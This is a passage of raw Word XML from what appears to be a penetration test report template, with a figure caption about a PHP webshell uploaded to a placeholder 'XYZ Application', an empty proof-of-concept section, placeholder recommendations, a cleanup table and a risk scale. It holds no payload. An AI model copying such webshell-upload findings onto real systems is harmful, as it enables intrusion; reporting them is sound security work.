      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="steps-to-reproduce"/>
      <w:bookmarkStart w:id="103" w:name="_Toc178498992"/>
      <w:bookmarkEnd w:id="100"/>
      <w:r w:rsidRPr="00A76F46">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Analysis and </w:t>
      </w:r>
      <w:r w:rsidR="004C0FFF" w:rsidRPr="00A76F46">
        <w:t>Steps to Reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w14:paraId="57B38EB4" w14:textId="41284C40" w:rsidR="003C45D6" w:rsidRPr="003C45D6" w:rsidRDefault="003C45D6" w:rsidP="003C45D6">
      <w:r>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B572AA3" w14:textId="77777777" w:rsidR="00A76F46" w:rsidRPr="00A76F46" w:rsidRDefault="00A76F46" w:rsidP="00A76F46"/>
    <w:p w14:paraId="7A0B786B" w14:textId="77777777" w:rsidR="00A76F46" w:rsidRPr="00A76F46" w:rsidRDefault="00A76F46" w:rsidP="00A76F46">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1374AB24" wp14:editId="7F2B9751">
            <wp:extent cx="5301862" cy="2732201"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="image5.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5.png" descr="A screenshot of a computer program&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="31553"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5301862" cy="2732201"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25178C78" w14:textId="77777777" w:rsidR="00A76F46" w:rsidRPr="00A76F46" w:rsidRDefault="00A76F46" w:rsidP="00A76F46">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Figure 2.3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> uploaded to XYZ Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6488C1C2" w14:textId="77777777" w:rsidR="00A76F46" w:rsidRDefault="00A76F46" w:rsidP="00A76F46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3273DD" w14:textId="5F5DA4D1" w:rsidR="003C45D6" w:rsidRDefault="003C45D6" w:rsidP="00A76F46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Steps to Reproduce (POC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C25C7F4" w14:textId="0819AB7F" w:rsidR="003C45D6" w:rsidRPr="00A76F46" w:rsidRDefault="003C45D6" w:rsidP="00A76F46">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCD5E4B" w14:textId="42021BDA" w:rsidR="004C0FFF" w:rsidRDefault="004C0FFF" w:rsidP="003C45D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="recommendation"/>
      <w:bookmarkStart w:id="105" w:name="_Toc178498993"/>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidRPr="00A76F46">
        <w:t>Recommendation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="1FBB8E02" w14:textId="77777777" w:rsidR="003C45D6" w:rsidRPr="00A76F46" w:rsidRDefault="003C45D6" w:rsidP="003C45D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A76F46">
        <w:t>Remove XYZ to make things more secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794396F3" w14:textId="77777777" w:rsidR="003C45D6" w:rsidRPr="00A76F46" w:rsidRDefault="003C45D6" w:rsidP="003C45D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If you </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can not</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76F46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> remove XYZ do this…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9BC59" w14:textId="77777777" w:rsidR="003C45D6" w:rsidRPr="003C45D6" w:rsidRDefault="003C45D6" w:rsidP="003C45D6"/>
    <w:p w14:paraId="00A726FC" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="003C45D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="post-penetration-cleanup"/>
      <w:bookmarkStart w:id="107" w:name="_Toc178498994"/>
      <w:bookmarkEnd w:id="104"/>
      <w:r w:rsidRPr="00A76F46">
        <w:t>Post Penetration Cleanup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1869"/>
        <w:gridCol w:w="2016"/>
        <w:gridCol w:w="5475"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w14:paraId="0E9215FF" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="278F4CD1" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00A76F46">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F82BB67" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00A76F46">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="155C3CB8" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00A76F46">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w14:paraId="32FD7ACD" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15627F20" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00A76F46">
              <w:t>Reboot host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EB3BDE5" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00A76F46">
              <w:t>192.168.20.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50890123" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF" w:rsidP="00D15D3A">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r w:rsidRPr="00A76F46">
              <w:t>To clear memory-resident exploit code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkEnd w:id="106"/>
    </w:tbl>
    <w:p w14:paraId="4DA6CDEA" w14:textId="77777777" w:rsidR="004C0FFF" w:rsidRPr="00A76F46" w:rsidRDefault="004C0FFF">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487736B5" w14:textId="77777777" w:rsidR="00475B86" w:rsidRPr="00A76F46" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="55C39AA4" w14:textId="77777777" w:rsidR="00475B86" w:rsidRPr="00A76F46" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="3E493CA5" w14:textId="77777777" w:rsidR="003C45D6" w:rsidRPr="003C45D6" w:rsidRDefault="003C45D6" w:rsidP="003C45D6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc178498995"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C45D6">
        <w:lastRenderedPageBreak/>
        <w:t>References  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C45D6">
        <w:t>opt)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="70251A17" w14:textId="77777777" w:rsidR="00475B86" w:rsidRPr="00A76F46" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EB7B45" w14:textId="77777777" w:rsidR="00475B86" w:rsidRPr="00A76F46" w:rsidRDefault="00000000" w:rsidP="00BF2874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidR="00922DBC" w:rsidRPr="00A76F46">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/Sevaarcen/RADAR/tree/master/radar/playbooks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48E4E17B" w14:textId="77777777" w:rsidR="00475B86" w:rsidRPr="00A76F46" w:rsidRDefault="00000000" w:rsidP="00BF2874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidR="00922DBC" w:rsidRPr="00A76F46">
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00922DBC" w:rsidRPr="00A76F46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB551BC" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E1A04E7" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C8EFA5C" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76EB9584" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B17B393" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FDB4502" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184487B5" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24E10833" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B0142A" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231006F6" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373FC13A" w14:textId="77777777" w:rsidR="00F70284" w:rsidRDefault="00F70284">
      <w:pPr>
        <w:spacing w:before="200" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5916D36E" w14:textId="77777777" w:rsidR="00FA5149" w:rsidRPr="009B6809" w:rsidRDefault="00966C99" w:rsidP="00966C99">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc177321910"/>
      <w:bookmarkStart w:id="110" w:name="_Toc177321911"/>
      <w:bookmarkStart w:id="111" w:name="_Toc178498996"/>
      <w:r w:rsidRPr="009B6809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
      <w:r w:rsidRPr="009B6809">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C04091" w14:textId="0808EA72" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00FA5149">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc178498997"/>
      <w:r w:rsidRPr="00FA5149">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A- CLASSIFICATION DEFINITIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w14:paraId="414B27FA" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="00A836BD"/>
    <w:p w14:paraId="4C143FD6" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="00A836BD"/>
    <w:p w14:paraId="1B86F511" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="00A836BD"/>
    <w:p w14:paraId="2027D262" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="00A836BD"/>
    <w:p w14:paraId="0D0C98B7" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="00A836BD"/>
    <w:p w14:paraId="41B56CA8" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="00A836BD"/>
    <w:p w14:paraId="21A46AEA" w14:textId="77777777" w:rsidR="00A836BD" w:rsidRPr="00A836BD" w:rsidRDefault="00A836BD" w:rsidP="00A836BD"/>
    <w:p w14:paraId="1ADB1DBB" w14:textId="323FE808" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00563257">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc178498998"/>
      <w:r w:rsidRPr="00563257">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Risk Classifications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="7F39C996" w14:textId="77777777" w:rsidR="00063F15" w:rsidRPr="00063F15" w:rsidRDefault="00063F15" w:rsidP="00063F15"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="92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410"/>
        <w:gridCol w:w="6255"/>
      </w:tblGrid>
      <w:tr w:rsidR="00966C99" w14:paraId="70E7DBDA" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:trHeight w:val="603"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="631052BE" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04432BA1" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6255" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="666666"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FED627B" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966C99" w14:paraId="03362098" w14:textId="77777777" w:rsidTr="00D15D3A">
        <w:trPr>
          <w:trHeight w:val="612"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1605" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:left w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:bottom w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
              <w:right w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="980000"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09EA2BDD" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1410" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="dashed" w:sz="12" w:space="0" w:color="FFFF00"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77A185E3" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="674EA7"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0A9A560C" w14:textId="77777777" w:rsidR="00966C99" w:rsidRDefault="00966C99" w:rsidP="00D15D3A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
                <w:b/>
                <w:color w:val="A61C00"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
